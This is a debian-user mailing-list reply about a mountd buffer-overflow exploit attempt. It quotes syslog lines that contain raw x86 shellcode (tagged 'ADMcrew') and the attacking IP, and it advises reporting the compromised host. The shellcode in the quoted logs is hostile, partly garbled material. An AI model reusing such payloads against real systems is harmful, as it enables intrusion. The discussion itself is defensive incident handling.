Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user.  Thanks!]
> 
> I got the followed logged in my /var/log/syslog today.  It looks to me
> like a buffer overflow attack of some kind (character  is `no
> operation' in x86 assembly language).  Does anyone know of a
> vulnerability in mountd to this sort of thing?

Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months.

Current versions of debian are not vunerable. It's a buffer overrun exploit
leading to root shell, I think.
 
> Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of 
> 3Û3À°^[̀3Ò3À‹Ú°^FÍ0Þ¢1uô1À°^B̀,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þȈFÿëì^°^B‰^FþȉF^D°^F‰F^H°f1ÛþÃ(Iq̀‰(B^F°^Bf‰F^L°*f‰F^NF^L‰F^D1À‰F^P°^P‰F^H°fþÃÍ01^A‰F^D°f³^DÍ0Ë1^DëLëR1À‰F^D‰F^H°fþÃ̀,HC°([EMAIL
>  PROTECTED]@‰F^D1ÀˆF^G‰v^H‰F^L°^K(Is(BN^HV^L̀1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet 
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben 
> ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H 
> attempted from 129.247.106.135 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access 
> 3Û3À°^[̀3Ò3À‹Ú°^FÍ0Þ¢1uô1À°^B̀,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þȈFÿëì^°^B‰^FþȉF^D°^F‰F^H°f1ÛþÃ(Iq̀‰(B^F°^Bf‰F^L°*f‰F^NF^L‰F^D1À‰F^P°^P‰F^H°fþÃÍ01^A‰F^D°f³^DÍ0Ë1^DëLëR1À‰F^D‰F^H°fþÃ̀,HC°([EMAIL
>  PROTECTED]@‰F^D1ÀˆF^G‰v^H‰F^L°^K(Is(BN^HV^L̀1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet 
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben 
> -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H
>  
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to 
> mount 
> 3Û3À°^[̀3Ò3À‹Ú°^FÍ0Þ¢1uô1À°^B̀,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þȈFÿëì^°^B‰^FþȉF^D°^F‰F^H°f1ÛþÃ(Iq̀‰(B^F°^Bf‰F^L°*f‰F^NF^L‰F^D1À‰F^P°^P‰F^H°fþÃÍ01^A‰F^D°f³^DÍ0Ë1^DëLëR1À‰F^D‰F^H°fþÃ̀,HC°([EMAIL
>  PROTECTED]@‰F^D1ÀˆF^G‰v^H‰F^L°^K(Is(BN^HV^L̀

It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing thier ISP about this in case this is the cracker's actual home
machine.

-- 
see shy jo

Reply via email to